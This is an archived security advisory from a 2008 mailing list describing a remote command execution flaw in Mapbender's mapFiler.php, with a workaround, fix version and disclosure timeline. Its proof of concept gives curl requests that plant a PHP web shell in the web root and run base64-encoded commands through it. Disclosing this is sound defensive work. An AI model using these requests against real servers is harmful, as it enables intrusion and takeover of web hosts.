Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Mapbender Command Execution

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Mapbender Command Execution
Date: 12 Mar 2008 09:46:46 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mapbender Command Execution
------------------------------------------------------------------------


SUMMARY

" <http://www.mapbender.org> Mapbender is the software and portal site for 
geodata management of OGC OWS architectures. The software provides web 
technology for managing spatial data services implemented in PHP, 
JavaScript and XML. It provides a data model and interfaces for 
displaying, navigating and querying OGC compliant map services. The 
Mapbender framework furthermore provides authentication and authorization 
services, OWS proxy functionality, management interfaces for user, group 
and service administration in WebGIS projects." During a penetration test 
RedTeam Pentesting discovered a remote command execution vulnerability in 
Mapbender. An unauthorized user can create arbitrary PHP-files on the 
Mapbender webserver, which can later be executed.

DETAILS

The Mapbender software comes with a script mapFiler.php, which is located 
at
http://www.example.com/tools/mapFiler.php

Due to the lack of input filtering, an attacker is able to enter valid PHP 
code in the "factor" input field. This PHP code is written into a newly 
generated file in the Mapbender webfolder. Therefore, it is possible to 
remotely execute the code by requesting the new file.

Proof of Concept:
For this example, the user account which is used to execute php scripts 
needs permissions to write files to the tmp directory. Any other directory 
with write permissions in the web root can be used, too.

Calling

curl -d "myLocation=../tmp/.&factor=<?php passthru(base64_decode(
    \$_GET[c])) ?>.php&button=let's go" http://www.example.com/
    tools/mapFiler.php

creates a file

tmp/_\<\?php\ passthru\(base64_decode\(\$_GET\[c\]\)\)\ \?\>.php.

with the content:

#Modified by MapbenderTools
#Date: 14.01.2008
#Factor: <?php passthru(base64_decode($_GET[c])) ?>.php

This script can then be executed by calling:

curl -g 'http://www.example.com/tmp/_<%3fphp%20passthru(base64_decode(
    $_GET[c]))%20%3f>.php.?c=aWQ'

It returns:

#Modified by MapbenderTools
#Date: 15.01.2008
#Factor: uid=33(www-data) gid=33(www-data) groups=33(www-data)
php

Commands sent to the script have to be base64 encoded and will be decoded 
by the PHP code, to avoid possible URL filtering on the victim's side.

Workaround:
If not needed, the mapfiler.php script can be removed. Otherwise, it can 
be protected by using an .htaccess directive.

Fix:
The vulnerability is fixed in release 2.4.5 rc1.

Security Risk:
The security risk is rated as high. An attacker can execute arbitrary 
commands remotely with the rights of the webserver.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0300> 
CVE-2008-0300

Disclosure Timeline:
2007-12-14 - Problem identified during a penetration test
2008-01-09 - Customer approves contacting of Mapbender developers
2008-01-17 - CVE number assigned
2008-03-10 - Vendor releases fixed version
2008-03-11 - Advisory released


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:release@redteam-pentesting.de> RedTeam Pentesting GmbH.
The original article can be found at:  
<http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php> 
http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Mapbender Command Execution, SecuriTeam <=
Previous by Date:  [NT] Acronis PXE Server Directory Traversal and NULL Pointer, SecuriTeam
Next by Date:  [UNIX] Mapbender SQL Injections, SecuriTeam
Previous by Thread:  [NT] Acronis PXE Server Directory Traversal and NULL Pointer, SecuriTeam
Next by Thread:  [UNIX] Mapbender SQL Injections, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]